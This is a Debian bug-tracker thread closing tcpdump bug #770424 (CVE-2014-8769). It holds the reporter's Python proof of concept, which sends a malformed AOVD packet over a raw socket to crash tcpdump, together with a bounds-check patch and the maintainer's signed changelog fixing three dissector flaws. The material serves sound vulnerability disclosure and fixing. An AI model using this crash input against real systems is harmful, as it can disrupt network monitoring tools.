Bug#770424: marked as done (tcpdump: CVE-2014-8769: unreliable output using malformed AOVD payload)

Sat, 22 Nov 2014 03:09:59 -0800 

Your message dated Sat, 22 Nov 2014 11:04:13 +0000
with message-id <e1xs8u9-0004fc...@franck.debian.org>
and subject line Bug#770424: fixed in tcpdump 4.6.2-2
has caused the Debian Bug report #770424,
regarding tcpdump: CVE-2014-8769: unreliable output using malformed AOVD payload
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
770424: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770424
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 

Package: tcpdump
Version: 4.6.2
tags: Security

Using following script to generate packet:

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01" 

s.send(aovd_frame)



#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug reports as CVE-2014-8769.
Propose patch is in attached file. Main idea is checking the length of
available data before print on screen.

The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

Original report in bugtraq:
http://seclists.org/bugtraq/2014/Nov/88

CongNT



--- tcpdump-tcpdump-4.6/print-udp.c	2014-11-21 13:53:05.757690197 +0700
+++ tcpdump-4.6.2/print-udp.c	2014-11-21 13:50:58.077695164 +0700
@@ -357,6 +357,12 @@
 #ifdef INET6
 	register const struct ip6_hdr *ip6;
 #endif
+	u_int caplength;
+
+	/* Checking length of available data before print */
+	caplength = (ndo->ndo_snapend >= bp) ? ndo->ndo_snapend - bp : 0;
+	if (length > caplength)
+		length = caplength;
 
 	if (ep > ndo->ndo_snapend)
 		ep = ndo->ndo_snapend;

--- End Message ---
--- Begin Message --- 
Source: tcpdump
Source-Version: 4.6.2-2

We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 770...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Francoise <rfranco...@debian.org> (supplier of updated tcpdump package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 22 Nov 2014 11:48:08 +0100
Source: tcpdump
Binary: tcpdump
Architecture: amd64 source
Version: 4.6.2-2
Distribution: unstable
Urgency: high
Maintainer: Romain Francoise <rfranco...@debian.org>
Changed-By: Romain Francoise <rfranco...@debian.org>
Closes: 770415 770424 770434
Description: 
 tcpdump    - command-line network traffic analyzer
Changes:
 tcpdump (4.6.2-2) unstable; urgency=high
 .
   * Urgency high due to security fixes.
   * Add three patches extracted from various upstream commits fixing
     vulnerabilities in three dissectors:
     + CVE-2014-8767: missing bounds checks in OLSR dissector (closes: #770434).
     + CVE-2014-8768: missing bounds checks in Geonet dissector
       (closes: #770415).
     + CVE-2014-8769: missing bounds checks in AOVD dissector (closes: #770424).
Checksums-Sha1: 
 57c8f0416165d208c8ae198dc98356d91afd09a9 1915 tcpdump_4.6.2-2.dsc
 7eaa17f35087f264ae326d76b31755f9742cb2b1 16688 tcpdump_4.6.2-2.debian.tar.xz
 7a1d0ae5a24ac88460613be7eacfd09780c8a9c4 376982 tcpdump_4.6.2-2_amd64.deb
Checksums-Sha256: 
 8487b9f862d770d803dcd0c6822c2202312f943492755b4841135a26256f4fc4 1915 
tcpdump_4.6.2-2.dsc
 0ae5ff1b8513b9218a01d38de2d4009f0f25c1437ba2d94eb4a6c8314466d6d2 16688 
tcpdump_4.6.2-2.debian.tar.xz
 ce138f564b1d427cdbec57ab626f967da7ba92e9d9411911fdfce0c311aa1c23 376982 
tcpdump_4.6.2-2_amd64.deb
Files: 
 b71ede0c26d7fa4bf8feca523e51efba 1915 net optional tcpdump_4.6.2-2.dsc
 4a0c1dd046d8e6d930c4407b6440bcac 16688 net optional 
tcpdump_4.6.2-2.debian.tar.xz
 3d9c3b86c1f252c7fa0c1de43f221077 376982 net optional tcpdump_4.6.2-2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJUcGwXAAoJEK0V9DXwX5Yt3WsP/1sjl9ezNdLHIhfTdKmfUJP6
xbG69dF5kIF5NgADtbVVcSQ21xMImTyuLPMCp0/mzPgU4G8V0qJIS4D4KmD9oZ/v
vJ0fC4ol5MBY3S6/uUXTJ/xTnFi1qZ/t07Efr1GVFymSHyDxiepSiYY+5fIsYl41
hnhqheKuSQQzU5mlaXDvaVCt8Bek/L1G4B1LbWAwIapkSBcop5e+CSiZ+kp3iVwG
CEyZR5QQLz8WkIzltjqak0fFYtMFim1bg+7/w5KkWCX4pax6GUsOboj364Y1wExz
ffgvAoTu9RQO8DF33ubyuK2Y3VatyxhLNelLQzLXOFyle2Wu5EfCexWEqkMJWFsu
WU9GMA+A3uYpdqZJzu3QJVIp5kG/jSuGWMnY5PLkh45VHZdH89m9d4cEbsd/w2jg
qlYGQj3rQeZcjdfDDRHCNTgAQKDIhn9CYzGphAfgNIbNh15T6WjF6oBGd/H5pBJ3
7GUVMX9nHeURRjnA3R9BICVkthWf25K2Hgq2H3TeOqqwlNdt+X7+SXd7ezzNbpdN
PiI9/WNNNOBqoIh56RKk0i8+tsbdO+QoL/dRPcpCfXvRTY5MPTDq6cJnqReftnXE
obbt0wFYVugIMFwvccVqcQ2OTW6tGqai5RD0bXrn9e9vynFBxgRJNaMjg17Z3Y+C
ETQcMhfhjAjUi4iq9U8B
=Rbni
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to